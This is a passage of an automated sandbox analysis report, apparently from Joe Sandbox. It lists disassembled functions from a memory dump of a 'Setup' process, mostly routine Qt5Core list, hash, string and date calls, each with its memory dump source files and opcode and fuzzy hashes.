                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?dispose@Data@1@@String@@$?begin@?end@?lock@Locker@@MutexMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3558201060-0
                                                                                                                                                              • Opcode ID: 5110dbbf546dac6e0713212564119c7e4bf9a627a9a97e2663bc7db9f3917ef9
                                                                                                                                                              • Instruction ID: 215b2e77390e75814035938fbc717ae9d421d805d9574860c63e7e6d406d681e
                                                                                                                                                              • Opcode Fuzzy Hash: 5110dbbf546dac6e0713212564119c7e4bf9a627a9a97e2663bc7db9f3917ef9
                                                                                                                                                              • Instruction Fuzzy Hash: 285171B2A0AA4286EB92CB25E440179B3E1FF85B94F854131DE5E47764EF3CE446CF10
                                                                                                                                                              Function 00007FFBA1993E40 Relevance: 12.1, APIs: 8, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1993E70), ref: 00007FFBA1992F3C
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?constEnd@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F51
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F5D
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?parseIp4@QIPAddressUtils@@YA_NAEAIPEBVQChar@@1@Z.QT5CORE ref: 00007FFBA1992F6E
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?constEnd@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F87
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA1992F93
                                                                                                                                                                • Part of subcall function 00007FFBA1992F20: ?parseIp6@QIPAddressUtils@@YAPEBVQChar@@AEAY0BA@EPEBV2@1@Z.QT5CORE ref: 00007FFBA1992FA4
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993E87
                                                                                                                                                              • ??0QStringRef@@QEAA@XZ.QT5CORE ref: 00007FFBA1993E91
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F35
                                                                                                                                                              • ??0QStringRef@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F43
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993F7E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993F88
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993FE2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993FEC
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ?size@QStringRef@@QEBAHXZ.QT5CORE ref: 00007FFBA19926CE
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ?size@QStringRef@@QEBAHXZ.QT5CORE ref: 00007FFBA19926DC
                                                                                                                                                                • Part of subcall function 00007FFBA19926B0: ??M@YA_NAEBVQStringRef@@0@Z.QT5CORE ref: 00007FFBA19926EE
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA19942C4
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA19942DC
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??8@YA_NAEBVQString@@0@Z.QT5CORE ref: 00007FFBA19942E8
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE ref: 00007FFBA19942FA
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1994318
                                                                                                                                                                • Part of subcall function 00007FFBA19942A0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1994323
                                                                                                                                                                • Part of subcall function 00007FFBA1994220: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1994266
                                                                                                                                                                • Part of subcall function 00007FFBA1994220: ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA1994270
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Char@@String$Ref@@V0@@$?size@Url@@$?child?const?data@?host@?parseAddressArray@@ByteChildComponentDateEnd@Event@Event@@@Flags@FormattingObject@@Option@Time@@Url@@@@@Utils@@$??8@Char@@1@Ip4@Ip6@Ref@@0@String@@0@V2@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 252662107-0
                                                                                                                                                              • Opcode ID: 968265c0047d1982af207c361097a9f374c12b612579b6d1aa272e331ef393d6
                                                                                                                                                              • Instruction ID: 743e2e7cc4d9243d7279424b8add11256cc9f8c9362def3bbe918564049b2572
                                                                                                                                                              • Opcode Fuzzy Hash: 968265c0047d1982af207c361097a9f374c12b612579b6d1aa272e331ef393d6
                                                                                                                                                              • Instruction Fuzzy Hash: DC5151A270AA46A5EB92DF71D4502FC6365FB5478CF844032DE4D17AA9DF3CD60ACB40
                                                                                                                                                              Function 00007FFBA19B4E30 Relevance: 12.1, APIs: 8, Instructions: 121COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E76
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E7F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E8B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,00007FFBA19F6D37,?,?,?,00000000,?,?,00007FFBA19F8255), ref: 00007FFBA19B4E97
                                                                                                                                                              • ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4EFA
                                                                                                                                                              • ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4F2A
                                                                                                                                                              • ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA19B4F7D
                                                                                                                                                              • ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA19B4FAC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$HashList$?begin@?detach_helper@?free_helper@Node@1@Node@1@@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 843918027-0
                                                                                                                                                              • Opcode ID: 51584910d54366e54fa507890ec50c78cb48df0017552a688520f2dc9e97155e
                                                                                                                                                              • Instruction ID: 76e58664211f6f0ebdf5a1be1d6dbb202d1ade8df65692272d907f94a0882161
                                                                                                                                                              • Opcode Fuzzy Hash: 51584910d54366e54fa507890ec50c78cb48df0017552a688520f2dc9e97155e
                                                                                                                                                              • Instruction Fuzzy Hash: 7D5162B1A0AB4687DBA5CF25E84452973A0FB44B98B108535DF9E47B60DF3CE846CF40
                                                                                                                                                              Function 00007FFBA1A02210 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885242468-0
                                                                                                                                                              • Opcode ID: bb706855c7eb7def53475c655eba660558e8039354a487ec71ea020ed359ccf2
                                                                                                                                                              • Instruction ID: ee6c86c41199180feb295189ecffdde58dfaaeb93d06e3cc28a4e0b8e24f732e
                                                                                                                                                              • Opcode Fuzzy Hash: bb706855c7eb7def53475c655eba660558e8039354a487ec71ea020ed359ccf2
                                                                                                                                                              • Instruction Fuzzy Hash: 9331C5B2B0AB4291DF629F21E8441B9A365FF85BE1B494133DD6E0B754EE3CD049CB00
                                                                                                                                                              Function 00007FFBA1A22870 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22890
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228A4
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228B0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A228C2
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22901
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A2290D
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A22986
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA1A46EB6), ref: 00007FFBA1A2298F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885242468-0
                                                                                                                                                              • Opcode ID: 9cfea631f4e31cd4f87a51b4e6bcf2b7f1bd55baf601cb126593b7b343877778
                                                                                                                                                              • Instruction ID: accd5de163743394d778d044da0ceb0a947a92f079f91224d10a5aa55bf21ce1
                                                                                                                                                              • Opcode Fuzzy Hash: 9cfea631f4e31cd4f87a51b4e6bcf2b7f1bd55baf601cb126593b7b343877778
                                                                                                                                                              • Instruction Fuzzy Hash: B131B8A2B0AB4281DF619F25E4441B9A351FF81BE1F494133DD6E07764EE3CD445CB00
                                                                                                                                                              Function 00007FFBA1980870 Relevance: 12.1, APIs: 8, Instructions: 89COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2885242468-0
                                                                                                                                                              • Opcode ID: 34b22653f62d11037dc0570acc6cda2dd9b04ea13ec3fa74b30fe02d2a0dfd92
                                                                                                                                                              • Instruction ID: 481a2ff316e4b627d5117c8a469f1fefc0a19340f6ad61bebcc68946cdfa3b59
                                                                                                                                                              • Opcode Fuzzy Hash: 34b22653f62d11037dc0570acc6cda2dd9b04ea13ec3fa74b30fe02d2a0dfd92
                                                                                                                                                              • Instruction Fuzzy Hash: C531D2B6A0AB4286EF618F29E4542B82361EF81BA5B488131CF5D47750DF3DE496CF40
                                                                                                                                                              Function 00007FFBA1980570 Relevance: 12.1, APIs: 8, Instructions: 88timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA19805EA
                                                                                                                                                              • ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980602
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980617
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA198062F
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980647
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980668
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980687
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973CE9), ref: 00007FFBA1980697
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$Spec@Time$??8@String@@0@$Qt@@@$V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3481700100-0
                                                                                                                                                              • Opcode ID: 8c5bd2440ae011e5c3eff1616f5efd0e4a1fc36add37c15e6d2fdc2b9cd4fe6d
                                                                                                                                                              • Instruction ID: a989164e1231d6373a794fb26c7b763b588c92bc1e717fa99409b6dd27a94c46
                                                                                                                                                              • Opcode Fuzzy Hash: 8c5bd2440ae011e5c3eff1616f5efd0e4a1fc36add37c15e6d2fdc2b9cd4fe6d
                                                                                                                                                              • Instruction Fuzzy Hash: 0A31A2B6B0A94185EF91CF25E0802786361EF84BDCF588132DF9E07695DF2DD555CB00
                                                                                                                                                              Function 00007FFBA1A03E30 Relevance: 12.1, APIs: 8, Instructions: 70memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E63
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E7A
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E89
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03E9A
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EB0
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EEF
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03EF8
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1A01DC8), ref: 00007FFBA1A03F09
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Option@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3388795032-0
                                                                                                                                                              • Opcode ID: 4a79312d7edfe359a7442db64b65ddd82cfaf9e61abd36db2a1adc429f08864f
                                                                                                                                                              • Instruction ID: 55722aa813a4c644b34e29979463e75a9b3d37ad36e4b7c25423ffbae246825e
                                                                                                                                                              • Opcode Fuzzy Hash: 4a79312d7edfe359a7442db64b65ddd82cfaf9e61abd36db2a1adc429f08864f
                                                                                                                                                              • Instruction Fuzzy Hash: 3F317C76709A418AD7949F2AE8401687B61FB89FE4B088136EFAE47794DF3DD444CB00
                                                                                                                                                              Function 00007FFBA19E5550 Relevance: 12.1, APIs: 8, Instructions: 67COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5566
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5573
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E558E
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55AB
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55CE
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E55E7
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5600
                                                                                                                                                              • ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000000,00007FFBA19E475E,?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E5611
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@HashNode@Node@1@$?first?nextU21@@$Mutex@@$?lock@?unlock@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3796807255-0
                                                                                                                                                              • Opcode ID: 05867bc09a312ffe809b9109bfed5a2af36e8eb43c497e1238f3fad0688930ec
                                                                                                                                                              • Instruction ID: a875e252050e8c84d962cb10db7b9814e0cfaf1e60571bd5421a66d454f6cdec
                                                                                                                                                              • Opcode Fuzzy Hash: 05867bc09a312ffe809b9109bfed5a2af36e8eb43c497e1238f3fad0688930ec
                                                                                                                                                              • Instruction Fuzzy Hash: 6921E5AAA4A74282FBA1DB32E4501392353AB55B58F585431DE1F47795DE3CE882CF10
                                                                                                                                                              Function 00007FFBA1976220 Relevance: 12.0, APIs: 8, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@Data@@List$?begin@?end@memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3442045237-0
                                                                                                                                                              • Opcode ID: ae78dabc0ebdf97b5c1d5a509f48ded30bb3be345d363f816b71f371ff68a59b
